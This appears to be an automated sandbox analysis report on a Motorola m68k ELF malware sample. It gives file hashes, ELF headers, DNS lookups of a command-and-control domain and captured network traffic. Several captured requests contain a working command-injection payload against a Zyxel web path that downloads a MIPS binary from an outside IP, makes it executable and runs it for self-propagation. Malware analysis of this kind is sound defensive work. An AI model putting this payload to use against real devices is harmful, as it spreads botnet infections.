                                                      SHA-512:06F0587D116B7CC156A6ACE01AB9C0872481402FCE8F2FCC806E9113CDB395B75E5579A5F8CC0126BED7DD36701D51FC4FC8C3324AAFA5A08D3797A4DC0665B8
                                                      Malicious:false
                                                      Preview:/tmp/3wN5NfZaD8.elf.
                                                      Process:/tmp/3wN5NfZaD8.elf
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):20
                                                      Entropy (8bit):4.021928094887362
                                                      Encrypted:false
                                                      SSDEEP:3:TgWJDMhm5:TgcDMO
                                                      MD5:ADA249F3E9D5A14EC5E7133CAE387FB2
                                                      SHA1:10A60996D518A9CADAFAD51EE33EBDD73C5778B5
                                                      SHA-256:A9C26C850D15FB83683C9B07C69E4FCD132A14A4E8859468D1034C52262EB428
                                                      SHA-512:06F0587D116B7CC156A6ACE01AB9C0872481402FCE8F2FCC806E9113CDB395B75E5579A5F8CC0126BED7DD36701D51FC4FC8C3324AAFA5A08D3797A4DC0665B8
                                                      Malicious:false
                                                      Preview:/tmp/3wN5NfZaD8.elf.
                                                      Process:/tmp/3wN5NfZaD8.elf
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):20
                                                      Entropy (8bit):4.021928094887362
                                                      Encrypted:false
                                                      SSDEEP:3:TgWJDMhm5:TgcDMO
                                                      MD5:ADA249F3E9D5A14EC5E7133CAE387FB2
                                                      SHA1:10A60996D518A9CADAFAD51EE33EBDD73C5778B5
                                                      SHA-256:A9C26C850D15FB83683C9B07C69E4FCD132A14A4E8859468D1034C52262EB428
                                                      SHA-512:06F0587D116B7CC156A6ACE01AB9C0872481402FCE8F2FCC806E9113CDB395B75E5579A5F8CC0126BED7DD36701D51FC4FC8C3324AAFA5A08D3797A4DC0665B8
                                                      Malicious:false
                                                      Preview:/tmp/3wN5NfZaD8.elf.
                                                      Process:/tmp/3wN5NfZaD8.elf
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):20
                                                      Entropy (8bit):4.021928094887362
                                                      Encrypted:false
                                                      SSDEEP:3:TgWJDMhm5:TgcDMO
                                                      MD5:ADA249F3E9D5A14EC5E7133CAE387FB2
                                                      SHA1:10A60996D518A9CADAFAD51EE33EBDD73C5778B5
                                                      SHA-256:A9C26C850D15FB83683C9B07C69E4FCD132A14A4E8859468D1034C52262EB428
                                                      SHA-512:06F0587D116B7CC156A6ACE01AB9C0872481402FCE8F2FCC806E9113CDB395B75E5579A5F8CC0126BED7DD36701D51FC4FC8C3324AAFA5A08D3797A4DC0665B8
                                                      Malicious:false
                                                      Preview:/tmp/3wN5NfZaD8.elf.
                                                      Process:/tmp/3wN5NfZaD8.elf
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):20
                                                      Entropy (8bit):4.021928094887362
                                                      Encrypted:false
                                                      SSDEEP:3:TgWJDMhm5:TgcDMO
                                                      MD5:ADA249F3E9D5A14EC5E7133CAE387FB2
                                                      SHA1:10A60996D518A9CADAFAD51EE33EBDD73C5778B5
                                                      SHA-256:A9C26C850D15FB83683C9B07C69E4FCD132A14A4E8859468D1034C52262EB428
                                                      SHA-512:06F0587D116B7CC156A6ACE01AB9C0872481402FCE8F2FCC806E9113CDB395B75E5579A5F8CC0126BED7DD36701D51FC4FC8C3324AAFA5A08D3797A4DC0665B8
                                                      Malicious:false
                                                      Preview:/tmp/3wN5NfZaD8.elf.
                                                      Process:/tmp/3wN5NfZaD8.elf
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):20
                                                      Entropy (8bit):4.021928094887362
                                                      Encrypted:false
                                                      SSDEEP:3:TgWJDMhm5:TgcDMO
                                                      MD5:ADA249F3E9D5A14EC5E7133CAE387FB2
                                                      SHA1:10A60996D518A9CADAFAD51EE33EBDD73C5778B5
                                                      SHA-256:A9C26C850D15FB83683C9B07C69E4FCD132A14A4E8859468D1034C52262EB428
                                                      SHA-512:06F0587D116B7CC156A6ACE01AB9C0872481402FCE8F2FCC806E9113CDB395B75E5579A5F8CC0126BED7DD36701D51FC4FC8C3324AAFA5A08D3797A4DC0665B8
                                                      Malicious:false
                                                      Preview:/tmp/3wN5NfZaD8.elf.
                                                      Process:/tmp/3wN5NfZaD8.elf
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):20
                                                      Entropy (8bit):4.021928094887362
                                                      Encrypted:false
                                                      SSDEEP:3:TgWJDMhm5:TgcDMO
                                                      MD5:ADA249F3E9D5A14EC5E7133CAE387FB2
                                                      SHA1:10A60996D518A9CADAFAD51EE33EBDD73C5778B5
                                                      SHA-256:A9C26C850D15FB83683C9B07C69E4FCD132A14A4E8859468D1034C52262EB428
                                                      SHA-512:06F0587D116B7CC156A6ACE01AB9C0872481402FCE8F2FCC806E9113CDB395B75E5579A5F8CC0126BED7DD36701D51FC4FC8C3324AAFA5A08D3797A4DC0665B8
                                                      Malicious:false
                                                      Preview:/tmp/3wN5NfZaD8.elf.
                                                      Process:/tmp/3wN5NfZaD8.elf
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):20
                                                      Entropy (8bit):4.021928094887362
                                                      Encrypted:false
                                                      SSDEEP:3:TgWJDMhm5:TgcDMO
                                                      MD5:ADA249F3E9D5A14EC5E7133CAE387FB2
                                                      SHA1:10A60996D518A9CADAFAD51EE33EBDD73C5778B5
                                                      SHA-256:A9C26C850D15FB83683C9B07C69E4FCD132A14A4E8859468D1034C52262EB428
                                                      SHA-512:06F0587D116B7CC156A6ACE01AB9C0872481402FCE8F2FCC806E9113CDB395B75E5579A5F8CC0126BED7DD36701D51FC4FC8C3324AAFA5A08D3797A4DC0665B8
                                                      Malicious:false
                                                      Preview:/tmp/3wN5NfZaD8.elf.
                                                      Process:/tmp/3wN5NfZaD8.elf
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):20
                                                      Entropy (8bit):4.021928094887362
                                                      Encrypted:false
                                                      SSDEEP:3:TgWJDMhm5:TgcDMO
                                                      MD5:ADA249F3E9D5A14EC5E7133CAE387FB2
                                                      SHA1:10A60996D518A9CADAFAD51EE33EBDD73C5778B5
                                                      SHA-256:A9C26C850D15FB83683C9B07C69E4FCD132A14A4E8859468D1034C52262EB428
                                                      SHA-512:06F0587D116B7CC156A6ACE01AB9C0872481402FCE8F2FCC806E9113CDB395B75E5579A5F8CC0126BED7DD36701D51FC4FC8C3324AAFA5A08D3797A4DC0665B8
                                                      Malicious:false
                                                      Preview:/tmp/3wN5NfZaD8.elf.
                                                      Process:/tmp/3wN5NfZaD8.elf
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):20
                                                      Entropy (8bit):4.021928094887362
                                                      Encrypted:false
                                                      SSDEEP:3:TgWJDMhm5:TgcDMO
                                                      MD5:ADA249F3E9D5A14EC5E7133CAE387FB2
                                                      SHA1:10A60996D518A9CADAFAD51EE33EBDD73C5778B5
                                                      SHA-256:A9C26C850D15FB83683C9B07C69E4FCD132A14A4E8859468D1034C52262EB428
                                                      SHA-512:06F0587D116B7CC156A6ACE01AB9C0872481402FCE8F2FCC806E9113CDB395B75E5579A5F8CC0126BED7DD36701D51FC4FC8C3324AAFA5A08D3797A4DC0665B8
                                                      Malicious:false
                                                      Preview:/tmp/3wN5NfZaD8.elf.
                                                      Process:/tmp/3wN5NfZaD8.elf
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):20
                                                      Entropy (8bit):4.021928094887362
                                                      Encrypted:false
                                                      SSDEEP:3:TgWJDMhm5:TgcDMO
                                                      MD5:ADA249F3E9D5A14EC5E7133CAE387FB2
                                                      SHA1:10A60996D518A9CADAFAD51EE33EBDD73C5778B5
                                                      SHA-256:A9C26C850D15FB83683C9B07C69E4FCD132A14A4E8859468D1034C52262EB428
                                                      SHA-512:06F0587D116B7CC156A6ACE01AB9C0872481402FCE8F2FCC806E9113CDB395B75E5579A5F8CC0126BED7DD36701D51FC4FC8C3324AAFA5A08D3797A4DC0665B8
                                                      Malicious:false
                                                      Preview:/tmp/3wN5NfZaD8.elf.
                                                      Process:/tmp/3wN5NfZaD8.elf
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):20
                                                      Entropy (8bit):4.021928094887362
                                                      Encrypted:false
                                                      SSDEEP:3:TgWJDMhm5:TgcDMO
                                                      MD5:ADA249F3E9D5A14EC5E7133CAE387FB2
                                                      SHA1:10A60996D518A9CADAFAD51EE33EBDD73C5778B5
                                                      SHA-256:A9C26C850D15FB83683C9B07C69E4FCD132A14A4E8859468D1034C52262EB428
                                                      SHA-512:06F0587D116B7CC156A6ACE01AB9C0872481402FCE8F2FCC806E9113CDB395B75E5579A5F8CC0126BED7DD36701D51FC4FC8C3324AAFA5A08D3797A4DC0665B8
                                                      Malicious:false
                                                      Preview:/tmp/3wN5NfZaD8.elf.
                                                      Process:/tmp/3wN5NfZaD8.elf
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):20
                                                      Entropy (8bit):4.021928094887362
                                                      Encrypted:false
                                                      SSDEEP:3:TgWJDMhm5:TgcDMO
                                                      MD5:ADA249F3E9D5A14EC5E7133CAE387FB2
                                                      SHA1:10A60996D518A9CADAFAD51EE33EBDD73C5778B5
                                                      SHA-256:A9C26C850D15FB83683C9B07C69E4FCD132A14A4E8859468D1034C52262EB428
                                                      SHA-512:06F0587D116B7CC156A6ACE01AB9C0872481402FCE8F2FCC806E9113CDB395B75E5579A5F8CC0126BED7DD36701D51FC4FC8C3324AAFA5A08D3797A4DC0665B8
                                                      Malicious:false
                                                      Preview:/tmp/3wN5NfZaD8.elf.
                                                      Process:/tmp/3wN5NfZaD8.elf
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):20
                                                      Entropy (8bit):4.021928094887362
                                                      Encrypted:false
                                                      SSDEEP:3:TgWJDMhm5:TgcDMO
                                                      MD5:ADA249F3E9D5A14EC5E7133CAE387FB2
                                                      SHA1:10A60996D518A9CADAFAD51EE33EBDD73C5778B5
                                                      SHA-256:A9C26C850D15FB83683C9B07C69E4FCD132A14A4E8859468D1034C52262EB428
                                                      SHA-512:06F0587D116B7CC156A6ACE01AB9C0872481402FCE8F2FCC806E9113CDB395B75E5579A5F8CC0126BED7DD36701D51FC4FC8C3324AAFA5A08D3797A4DC0665B8
                                                      Malicious:false
                                                      Preview:/tmp/3wN5NfZaD8.elf.
                                                      Process:/tmp/3wN5NfZaD8.elf
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):20
                                                      Entropy (8bit):4.021928094887362
                                                      Encrypted:false
                                                      SSDEEP:3:TgWJDMhm5:TgcDMO
                                                      MD5:ADA249F3E9D5A14EC5E7133CAE387FB2
                                                      SHA1:10A60996D518A9CADAFAD51EE33EBDD73C5778B5
                                                      SHA-256:A9C26C850D15FB83683C9B07C69E4FCD132A14A4E8859468D1034C52262EB428
                                                      SHA-512:06F0587D116B7CC156A6ACE01AB9C0872481402FCE8F2FCC806E9113CDB395B75E5579A5F8CC0126BED7DD36701D51FC4FC8C3324AAFA5A08D3797A4DC0665B8
                                                      Malicious:false
                                                      Preview:/tmp/3wN5NfZaD8.elf.
                                                      Process:/tmp/3wN5NfZaD8.elf
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):20
                                                      Entropy (8bit):4.021928094887362
                                                      Encrypted:false
                                                      SSDEEP:3:TgWJDMhm5:TgcDMO
                                                      MD5:ADA249F3E9D5A14EC5E7133CAE387FB2
                                                      SHA1:10A60996D518A9CADAFAD51EE33EBDD73C5778B5
                                                      SHA-256:A9C26C850D15FB83683C9B07C69E4FCD132A14A4E8859468D1034C52262EB428
                                                      SHA-512:06F0587D116B7CC156A6ACE01AB9C0872481402FCE8F2FCC806E9113CDB395B75E5579A5F8CC0126BED7DD36701D51FC4FC8C3324AAFA5A08D3797A4DC0665B8
                                                      Malicious:false
                                                      Preview:/tmp/3wN5NfZaD8.elf.
                                                      Process:/tmp/3wN5NfZaD8.elf
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):20
                                                      Entropy (8bit):4.021928094887362
                                                      Encrypted:false
                                                      SSDEEP:3:TgWJDMhm5:TgcDMO
                                                      MD5:ADA249F3E9D5A14EC5E7133CAE387FB2
                                                      SHA1:10A60996D518A9CADAFAD51EE33EBDD73C5778B5
                                                      SHA-256:A9C26C850D15FB83683C9B07C69E4FCD132A14A4E8859468D1034C52262EB428
                                                      SHA-512:06F0587D116B7CC156A6ACE01AB9C0872481402FCE8F2FCC806E9113CDB395B75E5579A5F8CC0126BED7DD36701D51FC4FC8C3324AAFA5A08D3797A4DC0665B8
                                                      Malicious:false
                                                      Preview:/tmp/3wN5NfZaD8.elf.
                                                      Process:/tmp/3wN5NfZaD8.elf
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):20
                                                      Entropy (8bit):4.021928094887362
                                                      Encrypted:false
                                                      SSDEEP:3:TgWJDMhm5:TgcDMO
                                                      MD5:ADA249F3E9D5A14EC5E7133CAE387FB2
                                                      SHA1:10A60996D518A9CADAFAD51EE33EBDD73C5778B5
                                                      SHA-256:A9C26C850D15FB83683C9B07C69E4FCD132A14A4E8859468D1034C52262EB428
                                                      SHA-512:06F0587D116B7CC156A6ACE01AB9C0872481402FCE8F2FCC806E9113CDB395B75E5579A5F8CC0126BED7DD36701D51FC4FC8C3324AAFA5A08D3797A4DC0665B8
                                                      Malicious:false
                                                      Preview:/tmp/3wN5NfZaD8.elf.
                                                      Process:/tmp/3wN5NfZaD8.elf
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):20
                                                      Entropy (8bit):4.021928094887362
                                                      Encrypted:false
                                                      SSDEEP:3:TgWJDMhm5:TgcDMO
                                                      MD5:ADA249F3E9D5A14EC5E7133CAE387FB2
                                                      SHA1:10A60996D518A9CADAFAD51EE33EBDD73C5778B5
                                                      SHA-256:A9C26C850D15FB83683C9B07C69E4FCD132A14A4E8859468D1034C52262EB428
                                                      SHA-512:06F0587D116B7CC156A6ACE01AB9C0872481402FCE8F2FCC806E9113CDB395B75E5579A5F8CC0126BED7DD36701D51FC4FC8C3324AAFA5A08D3797A4DC0665B8
                                                      Malicious:false
                                                      Preview:/tmp/3wN5NfZaD8.elf.
                                                      Process:/tmp/3wN5NfZaD8.elf
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):20
                                                      Entropy (8bit):4.021928094887362
                                                      Encrypted:false
                                                      SSDEEP:3:TgWJDMhm5:TgcDMO
                                                      MD5:ADA249F3E9D5A14EC5E7133CAE387FB2
                                                      SHA1:10A60996D518A9CADAFAD51EE33EBDD73C5778B5
                                                      SHA-256:A9C26C850D15FB83683C9B07C69E4FCD132A14A4E8859468D1034C52262EB428
                                                      SHA-512:06F0587D116B7CC156A6ACE01AB9C0872481402FCE8F2FCC806E9113CDB395B75E5579A5F8CC0126BED7DD36701D51FC4FC8C3324AAFA5A08D3797A4DC0665B8
                                                      Malicious:false
                                                      Preview:/tmp/3wN5NfZaD8.elf.
                                                      Process:/tmp/3wN5NfZaD8.elf
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):20
                                                      Entropy (8bit):4.021928094887362
                                                      Encrypted:false
                                                      SSDEEP:3:TgWJDMhm5:TgcDMO
                                                      MD5:ADA249F3E9D5A14EC5E7133CAE387FB2
                                                      SHA1:10A60996D518A9CADAFAD51EE33EBDD73C5778B5
                                                      SHA-256:A9C26C850D15FB83683C9B07C69E4FCD132A14A4E8859468D1034C52262EB428
                                                      SHA-512:06F0587D116B7CC156A6ACE01AB9C0872481402FCE8F2FCC806E9113CDB395B75E5579A5F8CC0126BED7DD36701D51FC4FC8C3324AAFA5A08D3797A4DC0665B8
                                                      Malicious:false
                                                      Preview:/tmp/3wN5NfZaD8.elf.
                                                      Process:/tmp/3wN5NfZaD8.elf
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):20
                                                      Entropy (8bit):4.021928094887362
                                                      Encrypted:false
                                                      SSDEEP:3:TgWJDMhm5:TgcDMO
                                                      MD5:ADA249F3E9D5A14EC5E7133CAE387FB2
                                                      SHA1:10A60996D518A9CADAFAD51EE33EBDD73C5778B5
                                                      SHA-256:A9C26C850D15FB83683C9B07C69E4FCD132A14A4E8859468D1034C52262EB428
                                                      SHA-512:06F0587D116B7CC156A6ACE01AB9C0872481402FCE8F2FCC806E9113CDB395B75E5579A5F8CC0126BED7DD36701D51FC4FC8C3324AAFA5A08D3797A4DC0665B8
                                                      Malicious:false
                                                      Preview:/tmp/3wN5NfZaD8.elf.
                                                      File type:ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, stripped
                                                      Entropy (8bit):5.8034799050558945
                                                      TrID:
                                                      • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                      File name:3wN5NfZaD8.elf
                                                      File size:165'984 bytes
                                                      MD5:73496a8b42e3064a6057779a513273a1
                                                      SHA1:17ad0f5cc44e18538f30446d795f0e68cd31f82d
                                                      SHA256:3df4d63dcc40f1b0e12ebd28bb09cb9eb52c757751d5941653c346586b9e0713
                                                      SHA512:11eba5fdadd43162d2f53a0fd2195a396652616927f083edb848d8e46b7ff7bfd4719e8dd7aa07e826f5703558a7aa12fc2d8cde970efae855a9b71c0e0efab7
                                                      SSDEEP:3072:Wp+AfUWxqkvjdD5vvtK9l0I3hS+DbvhuVrjbiqLSryvUzym+uo9f:k+jQpBWX0IxSivhsLSr0qymDoR
                                                      TLSH:F8F34AD7F900DEBDF40AE33B48130909B130B7E151921A376297797BEC3A1E91967E86
                                                      File Content Preview:.ELF.......................D...4.........4. ...(......................<...<....... .......<...\...\...I........... .dt.Q............................NV..a....da.....N^NuNV..J9....f>"y..\. QJ.g.X.#...\.N."y..\. QJ.f.A.....J.g.Hy..<.N.X.........N^NuNV..N^NuN

                                                      ELF header

                                                      Class:ELF32
                                                      Data:2's complement, big endian
                                                      Version:1 (current)
                                                      Machine:MC68000
                                                      Version Number:0x1
                                                      Type:EXEC (Executable file)
                                                      OS/ABI:UNIX - System V
                                                      ABI Version:0
                                                      Entry Point Address:0x80000144
                                                      Flags:0x0
                                                      ELF Header Size:52
                                                      Program Header Offset:52
                                                      Program Header Size:32
                                                      Number of Program Headers:3
                                                      Section Header Offset:165584
                                                      Section Header Size:40
                                                      Number of Section Headers:10
                                                      Header String Table Index:9
                                                      NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                      NULL0x00x00x00x00x0000
                                                      .initPROGBITS0x800000940x940x140x00x6AX002
                                                      .textPROGBITS0x800000a80xa80x20e1e0x00x6AX004
                                                      .finiPROGBITS0x80020ec60x20ec60xe0x00x6AX002
                                                      .rodataPROGBITS0x80020ed40x20ed40x2df00x00x2A002
                                                      .ctorsPROGBITS0x80025cc80x23cc80xc0x00x3WA004
                                                      .dtorsPROGBITS0x80025cd40x23cd40x80x00x3WA004
                                                      .dataPROGBITS0x80025ce00x23ce00x49b00x00x3WA0032
                                                      .bssNOBITS0x8002a6900x286900x46080x00x3WA004
                                                      .shstrtabSTRTAB0x00x286900x3e0x00x0001
                                                      TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                      LOAD0x00x800000000x800000000x23cc40x23cc46.19930x5R E0x2000.init .text .fini .rodata
                                                      LOAD0x23cc80x80025cc80x80025cc80x49c80x8fd00.53430x6RW 0x2000.ctors .dtors .data .bss
                                                      GNU_STACK0x00x00x00x00x00.00000x6RW 0x4
                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Feb 2, 2024 06:34:59.042001963 CET192.168.2.148.8.8.80xebc8Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                      Feb 2, 2024 06:35:09.902909994 CET192.168.2.148.8.8.80xfc52Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                      Feb 2, 2024 06:35:19.711893082 CET192.168.2.148.8.8.80xe3fdStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                      Feb 2, 2024 06:35:23.572484970 CET192.168.2.148.8.8.80x9166Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                      Feb 2, 2024 06:35:27.434560061 CET192.168.2.148.8.8.80x8797Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                      Feb 2, 2024 06:35:32.247653961 CET192.168.2.148.8.8.80x4a53Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                      Feb 2, 2024 06:35:41.106858015 CET192.168.2.148.8.8.80xd027Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                      Feb 2, 2024 06:35:50.896866083 CET192.168.2.148.8.8.80x1061Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                      Feb 2, 2024 06:36:01.712060928 CET192.168.2.148.8.8.80x7c1eStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                      Feb 2, 2024 06:36:05.547493935 CET192.168.2.148.8.8.80x3b32Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                      Feb 2, 2024 06:36:07.362807035 CET192.168.2.148.8.8.80x95b6Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                      Feb 2, 2024 06:36:17.238691092 CET192.168.2.148.8.8.80x7c33Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                      Feb 2, 2024 06:36:26.023706913 CET192.168.2.148.8.8.80x74d6Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                      Feb 2, 2024 06:36:36.886667967 CET192.168.2.148.8.8.80x6a02Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                      Feb 2, 2024 06:36:39.707097054 CET192.168.2.148.8.8.80xa7e0Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                      Feb 2, 2024 06:36:44.500901937 CET192.168.2.148.8.8.80x87Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                      Feb 2, 2024 06:36:46.357002974 CET192.168.2.148.8.8.80x3180Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                      Feb 2, 2024 06:36:48.215857029 CET192.168.2.148.8.8.80x48c5Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                      Feb 2, 2024 06:36:59.019493103 CET192.168.2.148.8.8.80x2f3cStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Feb 2, 2024 06:34:59.144398928 CET8.8.8.8192.168.2.140xebc8No error (0)haha.skyljne.click103.180.149.156A (IP address)IN (0x0001)false
                                                      Feb 2, 2024 06:35:10.005398035 CET8.8.8.8192.168.2.140xfc52No error (0)haha.skyljne.click103.180.149.156A (IP address)IN (0x0001)false
                                                      Feb 2, 2024 06:35:19.814407110 CET8.8.8.8192.168.2.140xe3fdNo error (0)haha.skyljne.click103.180.149.156A (IP address)IN (0x0001)false
                                                      Feb 2, 2024 06:35:23.675188065 CET8.8.8.8192.168.2.140x9166No error (0)haha.skyljne.click103.180.149.156A (IP address)IN (0x0001)false
                                                      Feb 2, 2024 06:35:27.539288998 CET8.8.8.8192.168.2.140x8797No error (0)haha.skyljne.click103.180.149.156A (IP address)IN (0x0001)false
                                                      Feb 2, 2024 06:35:32.349967003 CET8.8.8.8192.168.2.140x4a53No error (0)haha.skyljne.click103.180.149.156A (IP address)IN (0x0001)false
                                                      Feb 2, 2024 06:35:41.209650040 CET8.8.8.8192.168.2.140xd027No error (0)haha.skyljne.click103.180.149.156A (IP address)IN (0x0001)false
                                                      Feb 2, 2024 06:35:50.999159098 CET8.8.8.8192.168.2.140x1061No error (0)haha.skyljne.click103.180.149.156A (IP address)IN (0x0001)false
                                                      Feb 2, 2024 06:36:01.814712048 CET8.8.8.8192.168.2.140x7c1eNo error (0)haha.skyljne.click103.180.149.156A (IP address)IN (0x0001)false
                                                      Feb 2, 2024 06:36:05.650634050 CET8.8.8.8192.168.2.140x3b32No error (0)haha.skyljne.click103.180.149.156A (IP address)IN (0x0001)false
                                                      Feb 2, 2024 06:36:07.465253115 CET8.8.8.8192.168.2.140x95b6No error (0)haha.skyljne.click103.180.149.156A (IP address)IN (0x0001)false
                                                      Feb 2, 2024 06:36:17.341175079 CET8.8.8.8192.168.2.140x7c33No error (0)haha.skyljne.click103.180.149.156A (IP address)IN (0x0001)false
                                                      Feb 2, 2024 06:36:26.126070023 CET8.8.8.8192.168.2.140x74d6No error (0)haha.skyljne.click103.180.149.156A (IP address)IN (0x0001)false
                                                      Feb 2, 2024 06:36:36.989072084 CET8.8.8.8192.168.2.140x6a02No error (0)haha.skyljne.click103.180.149.156A (IP address)IN (0x0001)false
                                                      Feb 2, 2024 06:36:39.810995102 CET8.8.8.8192.168.2.140xa7e0No error (0)haha.skyljne.click103.180.149.156A (IP address)IN (0x0001)false
                                                      Feb 2, 2024 06:36:44.606497049 CET8.8.8.8192.168.2.140x87No error (0)haha.skyljne.click103.180.149.156A (IP address)IN (0x0001)false
                                                      Feb 2, 2024 06:36:46.459824085 CET8.8.8.8192.168.2.140x3180No error (0)haha.skyljne.click103.180.149.156A (IP address)IN (0x0001)false
                                                      Feb 2, 2024 06:36:48.318453074 CET8.8.8.8192.168.2.140x48c5No error (0)haha.skyljne.click103.180.149.156A (IP address)IN (0x0001)false
                                                      Feb 2, 2024 06:36:59.122303009 CET8.8.8.8192.168.2.140x2f3cNo error (0)haha.skyljne.click103.180.149.156A (IP address)IN (0x0001)false
                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      0192.168.2.143513484.125.4.132443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.103368044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1192.168.2.145483849.99.26.19443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.103657007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2192.168.2.1458032198.206.178.242443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.103800058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3192.168.2.143682450.252.154.170443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.103877068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4192.168.2.145126845.229.58.16443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.103944063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5192.168.2.1438204151.205.48.224443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.104022026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6192.168.2.1444044153.32.81.167443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.104127884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7192.168.2.1450206151.115.10.207443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.104187965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8192.168.2.145557647.245.100.1443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.104265928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


